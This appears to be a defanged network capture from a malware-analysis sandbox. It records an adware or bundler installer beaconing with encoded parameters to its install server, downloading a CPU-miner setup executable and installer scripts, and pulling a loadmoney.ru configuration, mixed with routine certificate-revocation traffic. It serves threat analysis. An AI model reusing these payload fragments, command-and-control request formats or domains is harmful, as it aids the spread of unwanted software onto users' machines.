GET /ii?alpha=Bj59QGU6aDIwbQspUmpqB3ouTWUGYnFoaCMGPBQqWTssQDETAnBWV1UlP1ZXC24hS05FXkoEclhBeBFxA2oEXhNsIj1UfVdjbkUzeShSbWoFcxRCb1N7KW4nZhMoD38BGidXEic2YDMJAA58QjRZXmUdGgZNDkNWGzgvHwYEaQlIFH5heVFnQSRmRzB7OxUuY1ogcw85ET4oP2ZmBCpUC0IwLA81GwIhaUlRajUTYihqJ3MUB0gNQjkTOiwcbQJtBEISfmtqAx8IMWYgU2xhSGouBHd2dmBOb3d7JmxAeQZkUjZlQD8QBCh0BnklMgRrGXcuUQlhEU0WeF17PBtjYyleFkYrf2YDPQY+ezsganhebCQdfSUBMwA9Nj17d1Z/A2lDOmMQOQAXbXZaVydxTCRbNngDRkUUQhxwF01ySy9aKFlQCw1iZhg2A3IIAWE+a0g3cRpkdhUvTjloMSxmATkPcABzIFZiRR8sOwsEdmRGPl8uchcYDEgSSCAeLmxDJw4dUBxQPSprAz4Jbx87XwRPHXo4GXF2ZUp/RVkqMTRdGX8+US10SnA1PzpnSVFsBx92Hm0pSQllWHAxRGMoWEUwWHt1FVUxb2pKIwxvfRBuKTMKOC1JIw86ag9uWUk= HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: install.plainsavingscenter.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Cache-Control: no-cache, no-store

Pragma: no-cache

Content-Type: text/plain; charset=utf-8

Expires: -1

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

SVR: SP001C2

X-Powered-By: ASP.NET

p3p: CP="CAO PSA OUR"

Date: Thu, 30 Apr 2015 23:07:14 GMT

Content-Length: 84

9lqmClH8AOQOJOk5m3YQ8BfkHk7yVeEHI/9WwFpR4k64QEapeOMgY gK51lD6R30Cj/8co1UT6cmk/h0QTb/....

POST /if?alpha=Bj59QGUAMTN5CB4JUmpqB3ouTWUGYnFoaCMGPBQqWTssQDETAnBWV1UlP1ZXC24hS05FXkoEclhBeBFxA2oEXhNsIj1UfVdjbkUzeShSbWoFcxRCb1N7KW4nZhMoD38BGidXEic2YDMJAA58QjRZXmUdGgZNDkNWGzgvHwYEaQlIFH5pbFEADzc3GUkkZ09VPhh+GFZgVGhwKjg2XXsUPw1tIVdlTUJ5KAkMYmFHMVorewNNUx5hAHgXYXlUM180QxUFPGlpLiEIBGZEMGQ+FSdlRCJlED8VOSkqMiUPA10qDQpCQD8QBjR2XgkbOBhgBW87CQkATA4Qfl4uc181VikMPUo7fmAfPAEmeyJpJGpUaSRUJWtxe09tfX8mKQ8hUyUQETFGJgYAPm9UWmxrVjJEKWYSHwZJAwFyWH51TyYTK1ATSHg2L119V3Q0BmwrYFwjEhp1J0h6SCswWTspFCpWaWMrcBI1EFtraE0JeHcYNholMQNIQEUaQjsbOC4KLlJmAUAZbTw1WWVdYGpPMHs0DCpxBH0vHE9BZ2tpcyQPIlx0dBFOKBFFFiJrWAkIEilKKz4sURRgNVQTZU8kPHoORDpDFQMOZX0YJgY+eyYgGU1oV3cwezhKKWRubmU2JQQiZhEPUGk= HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: install.plainsavingscenter.com

Content-Length: 78

Connection: Keep-Alive

Cache-Control: no-cache

alpha=Bj59QGV0PEtiFVgoeCQLIWEuU3p8anxhCQEQP3YoRD5NKj8AEyFab1EhISptBn8hSjoHGEcf

HTTP/1.1 200 OK

Cache-Control: no-cache, no-store

Pragma: no-cache

Content-Type: text/plain; charset=utf-8

Expires: -1

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

SVR: SP001C2

X-Powered-By: ASP.NET

p3p: CP="CAO PSA OUR"

Date: Thu, 30 Apr 2015 23:07:14 GMT

Content-Length: 84

9lqmClH8AOQOJOk5m3YQ8BfkHk7yVeEHI/9WwFpR4k64QEapeOMgY gK51lD6R30Cj/8co1UT6cmk/h0QTb/HTTP/1.1 200 OK..Cache-Control: no-cache, no-store..Pragma: no-cache..Content-Type: text/plain; charset=utf-8..Expires: -1..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..SVR: SP001C2..X-Powered-By: ASP.NET..p3p: CP="CAO PSA OUR"..Date: Thu, 30 Apr 2015 23:07:14 GMT..Content-Length: 41..{"status":"OK","url":null,"message":null}..

GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1

Cache-Control: max-age = 900

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Tue, 24 Mar 2015 05:02:25 GMT

If-None-Match: "a1132b8ef65d01:0"

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.microsoft.com

HTTP/1.1 304 Not Modified

Content-Type: application/pkix-crl

Last-Modified: Tue, 24 Mar 2015 05:02:25 GMT

ETag: "a1132b8ef65d01:0"

Cache-Control: max-age=900

Date: Thu, 30 Apr 2015 23:11:47 GMT

Connection: keep-alive

HTTP/1.1 304 Not Modified..Content-Type: application/pkix-crl..Last-Modified: Tue, 24 Mar 2015 05:02:25 GMT..ETag: "a1132b8ef65d01:0"..Cache-Control: max-age=900..Date: Thu, 30 Apr 2015 23:11:47 GMT..Connection: keep-alive..

GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.microsoft.com

HTTP/1.1 200 OK

Content-Type: application/pkix-crl

Last-Modified: Tue, 14 Apr 2015 05:02:07 GMT

Accept-Ranges: bytes

ETag: "2711f7277076d01:0"

Server: Microsoft-IIS/8.5

VTag: 279782516600000000

P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"

X-Powered-By: ASP.NET

Content-Length: 554

Cache-Control: max-age=900

Date: Thu, 30 Apr 2015 23:12:18 GMT

Connection: keep-alive

0..&0......0...*.H........0y1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1#0!..U....Microsoft Code Signing PCA..150413163223Z..150713045223Z.a0_0...U.#..0..........X..7.3...L...0... .....7.........0...U......Z0... .....7......150712164223Z0...*.H.............WK....e.\.-.n......./......."]..E!.. //=...[....w... ..........#...[.l.J..f|..... .s......w...J._.......3.[..#.z....ko.I..Q{....e.nV......F..d}..rF\H.jlH]dQ.E....x......W............j....&L. 2.$.?...X?.#.(.....pK.v.......y..r....t......=.AW......K.G.gJD.b...

GET /mobile/mt-core.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: VVV.mobimidia.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:07:07 GMT

Server: Apache

Last-Modified: Fri, 04 Mar 2011 18:46:26 GMT

ETag: "1448627-161ce-49dac90326480"

Accept-Ranges: bytes

Content-Length: 90574

Connection: close

Content-Type: application/x-javascript

/*.---.MooTools: the javascript framework..web build:. - hXXp://mootools.net/core/7c56cfef9dddcf170a5d68e3fb61cfd7..packager build:. - packager build Core/Core Core/Array Core/String Core/Number Core/Function Core/Object Core/Event Core/Browser Core/Class Core/Class.Extras Core/Slick.Parser Core/Slick.Finder Core/Element Core/Element.Style Core/Element.Event Core/Element.Dimensions Core/Fx Core/Fx.CSS Core/Fx.Tween Core/Fx.Morph Core/Fx.Transitions Core/Request Core/Request.HTML Core/Request.JSON Core/Cookie Core/JSON Core/DOMReady Core/Swiff..copyrights:. - [MooTools](hXXp://mootools.net)..licenses:. - [MIT License](http://mootools.net/license.txt).....*/.(function(){this.MooTools={version:"1.3.1",build:"af48c8d589f43f32212f9bb8ff68a127e6a3ba6c"};var e=this.typeOf=function(i){if(i==null){return"null";}if(i.$family){return i.$family();.}if(i.nodeName){if(i.nodeType==1){return"element";}if(i.nodeType==3){return(/\S/).test(i.nodeValue)?"textnode":"whitespace";}}else{if(typeof i.length=="number"){if(i.callee){return"arguments";.}if("item" in i){return"collection";}}}return typeof i;};var u=this.instanceOf=function(w,i){if(w==null){return false;}var v=w.$constructor||w.constructor;.while(v){if(v===i){return true;}v=v.parent;}return w instanceof i;};var f=this.Function;var r=true;for(var q in {toString:1}){r=null;}if(r){r=["hasOwnProperty","valueOf","isPrototypeOf","propertyIsEnumerable","toLocaleString","toString","constructor"];.}f.prototype.overloadSetter=function(v){var i=this;return function(x,w){if(x==null){

<<< skipped >>>

GET /CPUminer/cpuminer-x11opt-setup.exe HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)

Host: VVV.software-forus.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:07:08 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1427702688"

Last-Modified: Mon, 30 Mar 2015 08:04:48 GMT

Cache-Control: max-age=73285

Content-Length: 2586343

Content-Type: application/octet-stream

X-HW: 1430435229.dop007.am4.t,1430435228.cds054.am4.c

Content-Disposition: attachment; filename="cpuminer-x11opt-setup.exe"

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....n3T.................\...........0.......p....@..........................@............@..................................s...........B...........................................................................p...............................text...|Z.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc....B.......D...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....6B..H.P.u..u..u....r@..B...SV.5.6B..E.WP.u....r@..e...E..E.P.u....r@..}..e....Lp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Tp@..E...E.P.E.P.u....r@..u....E..9}...w....~X.te.v4..Dp@....E.tU.}.j.W.E......E.......@p@..vXW..Hp@..u..5<p@.W...E..E.h ...Pj.h..B.W...r@..u.W...u....E.P.u...\r@._^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.

<<< skipped >>>

GET /V19/amipb.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.amoninst.com/index.php

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)

Host: cdn1.lawfuldownload.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/x-javascript

Content-Length: 61399

Connection: keep-alive

Date: Fri, 24 Apr 2015 08:51:14 GMT

Last-Modified: Thu, 19 Feb 2015 14:37:18 GMT

ETag: "52bb6eb78bfd9436ad34be6fc97eae8c"

Accept-Ranges: bytes

Server: AmazonS3

Age: 61933

X-Cache: Hit from cloudfront

Via: 1.1 1215b20e825091002cc9421604422697.cloudfront.net (CloudFront)

X-Amz-Cf-Id: xvLGUt83RdPMDlFA2UmHO8rLncLUKhDgc5SLuQQXMezdvUXxw9WTfg==

..//<!-- ../* Progress bar */..var g_AmiPbs = new Array();..var g_AmiPbsEx = new Array();..var g_interval = 0;..var g_initComp = 0;..var g_possibleComps = [];..var g_reportedComps = [];..var g_removedComps = [];....function LogMessage(message) {.. try {.. g_ami.Log(message);.. }.. catch (excpt) { }..}..function IsDeclined(name) {.. var declined = 0;.. for (var i = 0; i < g_removedComps.length; i ) {.. if (g_removedComps[i] == name) {.. declined = 1;.. break;.. }.. }.. return declined;..}..function UpdateSkipStatus(sn) {.. if (g_testa && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn)) {.. if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {.. g_ami.WriteProfileString(g_testf, '', sn, 'S');.. }.. }..}..function ShortNameFromName(name) {.. for (c = 0; c < g_comps.length; c ) {.. if (g_comps[c].name == name) {.. return g_comps[c].sn;.. }.. }.. return name;..}..function UpdateComponentsStatus() {.. LogMessage('UpdateComponentsStatus function started');.. for (var j = 0; j < g_possibleComps.length; j ) {.. var reported = 0;.. if (g_possibleComps[j].sn == 'updater') {.. continue;.. }.. for (var i = 0; i < g_reportedComps.length; i ) {.. if (g_reportedComps[i].sn == g_possibleComps[j].sn) {.. reported = 1;.. break;.. }.. }.. if

<<< skipped >>>

GET /v4/sof-installer/MAS_WIN7X64_adm_1FEBFBFF000306C3?action=pcm.chromesyn.exist HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: xa.xingcloud.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/0.7.67

Date: Thu, 30 Apr 2015 23:07:39 GMT

Content-Type: text/html; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

xa-api-version: v4

Content-Encoding: gzip

57.............V*.I,)V.R..V.Q*..M.....L.r......... .....T.C......<............T..Z.K...H.....0..

GET /get_info?pid=7718 HTTP/1.1

Accept: */*

Host: loadmoney.ru

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

HTTP/1.1 200 OK

Server: nginx

Date: Thu, 30 Apr 2015 23:07:08 GMT

Content-Type: text/html

Content-Length: 70

Connection: keep-alive

X-Powered-By: PHP/5.4.40

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Thu, 30 Apr 2015 23:07:08 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

Set-Cookie: guest_sess_id=g-a79ad5449bfbd23a1412336daed149245542; expires=Fri, 01-May-2015 23:07:08 GMT; path=/; domain=loadmoney.ru

{"rfr":"openpart","dmn":"horses.profsummer.ru","bin_dmn":"brbshop.ru"}HTTP/1.1 200 OK..Server: nginx..Date: Thu, 30 Apr 2015 23:07:08 GMT..Content-Type: text/html..Content-Length: 70..Connection: keep-alive..X-Powered-By: PHP/5.4.40..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Last-Modified: Thu, 30 Apr 2015 23:07:08 GMT..Cache-Control: no-cache, must-revalidate..Pragma: no-cache..Set-Cookie: guest_sess_id=g-a79ad5449bfbd23a1412336daed149245542; expires=Fri, 01-May-2015 23:07:08 GMT; path=/; domain=loadmoney.ru..{"rfr":"openpart","dmn":"horses.profsummer.ru","bin_dmn":"brbshop.ru"}..

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFIA5aolVvwahu2WydRLM8c= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com

HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1762

content-transfer-encoding: binary

Cache-Control: max-age=329046, public, no-transform, must-revalidate

Last-Modified: Mon, 27 Apr 2015 18:34:46 GMT

Expires: Mon, 4 May 2015 18:34:46 GMT

Date: Thu, 30 Apr 2015 23:12:11 GMT

Connection: keep-alive

0..........0..... .....0......0...0......;O}a.!..u...au..eUNp..20150427183446Z0s0q0I0... ...................B.>.I.$&.....e......0..C9...313..R...%V.......K3.....20150427183446Z....20150504183446Z0...*.H.............<........4Tl |..2e....".....7..\.|........H...LdiH..C.#=ty.A.m2."......,....F..eK.H...t.C...Ak.y...M4.d..n.N..X.Jn...^....:...~.}R.b..k]....E.]...&...0?.]....8..*E8..1'E:a<..~N.....A...=...d.6...7..._..R..G.....A%h.0jN.H....`u...^.YX.DW\3$.yG..g..BW....!......0...0...0...........2...'U.BM...g.B0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Public Primary Certification Authority - G50...141202000000Z..151216235959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec Trust Network1?0=..U...6Symantec Class 3 PCA - G5 OCSP Responder Certificate 30.."0...*.H.............0...............2&..PL...,..2....:..tH...`JG.%..*...s.c%...?t..J..0.q....~..k@X.l.i....0..kk..h.9"1.5?..s.....3[...u......]...R0..Z}....l..I.Y.....j\H.q...#.uw.4qz.#.J.....@2$"..$l.B.......D.ye..(..2.........@...... ...."... E..0M,..b{.^..s'....f.6.pr4.J........'j..........0...0...U.......0.0l..U. .e0c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0...U...........0... .....0......0!..U....0...0.1.0...U....TGV-B-2760...U......;O}a.!..u...au..eUNp0...U.#..0.....e......0..C9...3130...*.H.............(.&..Dgr.Ve..#...5

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTSqZMG5M8TA9rdzkbCnNwuMAd5VgQUz5mp6nsm9EvJjo/X8AUm7+PSp50CEALa8SdwQh28+NjkQGqVhx8= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com

HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1725

content-transfer-encoding: binary

Cache-Control: max-age=561798, public, no-transform, must-revalidate

Last-Modified: Thu, 30 Apr 2015 11:15:29 GMT

Expires: Thu, 7 May 2015 11:15:29 GMT

Date: Thu, 30 Apr 2015 23:12:11 GMT

Connection: keep-alive

0..........0..... .....0......0...0......N$p...v....1.;..vn....20150430111529Z0s0q0I0... ...................F....0.yV......{&.K......&..........'pB.....@j.......20150430111529Z....20150507111529Z0...*.H..............9K....i...{.-.?j.L...Y{:.;G<Xq>a.........p..f..N...F.Ki>*.l...FzN...*JT...YJ]...2.K.....\.=.Y.LG....L..@.;..^.PS.Gs....'KJ...8......jE#U1}._.HV...)q_Y<}'t........f(.l .W$....#U....G...q.D...2.K...L.../...m.t....,.gHk~y..$X.....RH7|.^..h=...uV)..".............0...0...0............F...I]A(M..s@.0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Signing 2010 CA0...150225000000Z..150526235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1VeriSign Class 3 Code Signing 2010 OCSP Responder0.."0...*.H.............0.........q<...A...#......A...u..Lz.............o..D.vQ%..s.......f....e../jI.d.W.....|K;.j5...#.B%.]..~S.... .|;S.&.....N..`...5.....!D.p....M/.. ..;j...q..`6...2.Ck..BnLHvCZn%....,.w.Ooi..z'...\.Yx......b..L...5.o..o..{..}.........%e.....N..._i........*Bc....:yQg.........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://www.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-31830...*.H..............-..^.........f.P`...s.....8.....V.......... .... B.

<<< skipped >>>

GET /root.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.globalsign.net

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:11:57 GMT

Content-Type: application/x-pkcs7-crl

Content-Length: 649

Connection: keep-alive

Set-Cookie: __cfduid=d9646b74727c3a81fb354a8417669753a1430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.net; HttpOnly

Expires: Wed, 15 Jul 2015 00:00:00 GMT

Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT

Cache-Control: public, max-age=6482883

CF-Cache-Status: HIT

Accept-Ranges: bytes

Server: cloudflare-nginx

CF-RAY: 1df6edc007da0f4b-FRA

0...0..m...0...*.H........0W1.0...U....BE1.0...U....GlobalSign nv-sa1.0...U....Root CA1.0...U....GlobalSign Root CA..150323000000Z..150715000000Z0..0*.........D.....141125000000Z0.0...U.......0*........)E.....141125000000Z0.0...U.......0*........ ...h..141125000000Z0.0...U.......0*........,^.....141125000000Z0.0...U......../0-0...U......00...U.#..0...`{f.E....P/}..4....K0...*.H.............&...f#...5.[4........{pV.#.F........:...*Q.....Mx9}....,.S.D.>@.Ju.[)c...`.?.j~...-..{.FHj.....#.C2.[.,`.......)...Bj2........n...........%......p.6......Q.....1..pd......F.........mJO.!y.W.......V.M).N.R.....V..|...7.ry. ..gy..I\.........j....... .z.E..".HTTP/1.1 200 OK..Date: Thu, 30 Apr 2015 23:11:57 GMT..Content-Type: application/x-pkcs7-crl..Content-Length: 649..Connection: keep-alive..Set-Cookie: __cfduid=d9646b74727c3a81fb354a8417669753a1430435517; expires=Fri, 29-Apr-16 23:11:57 GMT; path=/; domain=.globalsign.net; HttpOnly..Expires: Wed, 15 Jul 2015 00:00:00 GMT..Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT..Cache-Control: public, max-age=6482883..CF-Cache-Status: HIT..Accept-Ranges: bytes..Server: cloudflare-nginx..CF-RAY: 1df6edc007da0f4b-FRA..0...0..m...0...*.H........0W1.0...U....BE1.0...U....GlobalSign nv-sa1.0...U....Root CA1.0...U....GlobalSign Root CA..150323000000Z..150715000000Z0..0*.........D.....141125000000Z0.0...U.......0*........)E.....141125000000Z0.0...U.......0*........ ...h..141125000000Z0.0...U.......0*........,^.....141125000000Z0.0...U......../0-0...U......00...U.#..0...`{f.E....P/}..4....K0.

<<< skipped >>>

POST /ocsp HTTP/1.1

Host: clients1.google.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/ocsp-request

Connection: keep-alive

Content-Length: 107

0i0g0E0C0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.

.sR'..i..0.0... .....0...0... .....0..

HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Thu, 30 Apr 2015 23:07:21 GMT

Expires: Mon, 04 May 2015 23:07:21 GMT

Cache-Control: public, max-age=345600

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Alternate-Protocol: 80:quic,p=1

0..........0..... .....0......0...0......J......h.v....b..Z./..20150430131328Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./....sR'..i....20150430131328Z....20150507131328Z0...*.H.............m..f.....~.A.$.o....q.\.F.B..........k.-.cL".u..../.l..KW...(.,..X1.v-....3CD..N.....d..(a.,u..S...-.I.F.Nv..:....{..2..g{.i....S.Vr]..8.P"t'.......O....T.k#<S&..=....].-8.{~ls.,Oie.in...N..~...|!..N%....@....,ck.Z....,E....."...C].#...............nzN....AHTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 30 Apr 2015 23:07:21 GMT..Expires: Mon, 04 May 2015 23:07:21 GMT..Cache-Control: public, max-age=345600..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Alternate-Protocol: 80:quic,p=1..0..........0..... .....0......0...0......J......h.v....b..Z./..20150430131328Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./....sR'..i....20150430131328Z....20150507131328Z0...*.H.............m..f.....~.A.$.o....q.\.F.B..........k.-.cL".u..../.l..KW...(.,..X1.v-....3CD..N.....d..(a.,u..S...-.I.F.Nv..:....{..2..g{.i....S.Vr]..8.P"t'.......O....T.k#<S&..=....].-8.{~ls.,Oie.in...N..~...|!..N%....@....,ck.Z....,E....."...C].#...............nzN....A....

<<< skipped >>>

POST /ocsp HTTP/1.1

Host: clients1.google.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/ocsp-request

Connection: keep-alive

Content-Length: 107

0i0g0E0C0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.....F......0.0... .....0...0... .....0..

HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Thu, 30 Apr 2015 23:07:21 GMT

Expires: Mon, 04 May 2015 23:07:21 GMT

Cache-Control: public, max-age=345600

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Alternate-Protocol: 80:quic,p=1

0..........0..... .....0......0...0......J......h.v....b..Z./..20150430130944Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.....F........20150430130944Z....20150507130944Z0...*.H.............<....B&.;. ..U....D./;...x..Ai....,..|..e(......4_'Y,..f.....{p.vDL.g..w...\.q\.SdO..1..=....lwux?IEG.)A.}..._..Zg.l0...zk...I....%O.j.....e...-.........d.a.%.;.......G......B.l....J.]..R..(.$L..o..._....2...'..........}=......J. ....I...|@zj..._J(.... ...HTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 30 Apr 2015 23:07:21 GMT..Expires: Mon, 04 May 2015 23:07:21 GMT..Cache-Control: public, max-age=345600..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Alternate-Protocol: 80:quic,p=1..0..........0..... .....0......0...0......J......h.v....b..Z./..20150430130944Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.....F........20150430130944Z....20150507130944Z0...*.H.............<....B&.;. ..U....D./;...x..Ai....,..|..e(......4_'Y,..f.....{p.vDL.g..w...\.q\.SdO..1..=....lwux?IEG.)A.}..._..Zg.l0...zk...I....%O.j.....e...-.........d.a.%.;.......G......B.l....J.]..R..(.$L..o..._....2...'..........}=......J. ....I...|@zj..._J(.... .....

<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/D69B561148F01C77C54578C10926DF5B856976AD.crt?675a91727ba9c962 HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ctldl.windowsupdate.com

HTTP/1.1 200 OK

Content-Type: application/x-x509-ca-cert

Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT

Accept-Ranges: bytes

ETag: "05934e1494dd01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 867

Date: Thu, 30 Apr 2015 23:11:56 GMT

Connection: keep-alive

0.._0..G.............!XS..0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0...090318100000Z..290318100000Z0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0.."0...*.H.............0.........%v.y.x".......(...v....r.F.C....._$..K.`.F.R...Gpl.d...,...=. .......y.;..w...I.jb/.^..h..'.8...>..&Y.s....&.....[...`.I.(.i;...(....aW7.t..t.:.r/.......=...3.. .S.:.s..A. :......O..2`.W....hh.8&`u..w..... I..@.H..1a.^....w.d.z._....b..l.Ti....n...qv.i.........B0@0...U...........0...U.......0....0...U........K...E$.MP.c.......0...*.H.............K@..P.......TEI....A.....(.3.k.t...-..........sgJ..D{x..nlo.).39E....Wl.....S.-.$l..c..ShgV>...5!..h....S......]F...zX(./....7A..Dm.S(.~.g.........L'.L.ssv.....z..-....,.<.U...~6..WI...-|`..AQ.#...2k.....,3.:;%..@.;,.x.a/....Uo.....M.(.r..bPe.....1....GX?_HTTP/1.1 200 OK..Content-Type: application/x-x509-ca-cert..Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT..Accept-Ranges: bytes..ETag: "05934e1494dd01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Content-Length: 867..Date: Thu, 30 Apr 2015 23:11:56 GMT..Connection: keep-alive..0.._0..G.............!XS..0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0...090318100000Z..290318100000Z0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0.."0...*.H.............0.........%v.y.x".......(...v....r.F.C....._$..K.`.F.R...Gpl.d...,...=. .......y.;..w...I.jb/.^..h..'.8...>..&Y.s....&.

<<< skipped >>>

GET /root-r3.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.globalsign.net

HTTP/1.1 200 OK

Date: Thu, 30 Apr 2015 23:11:56 GMT

Content-Type: application/x-pkcs7-crl

Content-Length: 594

Connection: keep-alive

Set-Cookie: __cfduid=d25feb04b850f57981ac8c792aba941aa1430435516; expires=Fri, 29-Apr-16 23:11:56 GMT; path=/; domain=.globalsign.net; HttpOnly

Expires: Wed, 15 Jul 2015 00:00:00 GMT

Last-Modified: Mon, 23 Mar 2015 00:00:00 GMT

Cache-Control: public, max-age=6482884

CF-Cache-Status: HIT

Accept-Ranges: bytes

Server: cloudflare-nginx

